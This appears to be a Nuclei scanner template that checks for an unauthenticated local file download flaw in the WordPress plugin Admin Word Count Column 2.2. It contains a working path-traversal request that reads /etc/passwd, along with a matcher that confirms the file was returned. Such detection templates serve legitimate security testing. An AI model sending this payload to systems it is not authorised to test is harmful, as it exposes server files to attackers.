nuclei-templates/vulnerabilities/wordpress/admin-word-count-column-lfi...

26 lines
717 B
YAML

id: admin-word-count-column-lfi
info:
name: Admin word count column 2.2 - Unauthenticated Local File Download
author: daffainfo,Splint3r7
severity: high
reference:
- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
- https://wordpress.org/plugins/admin-word-count-column/
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200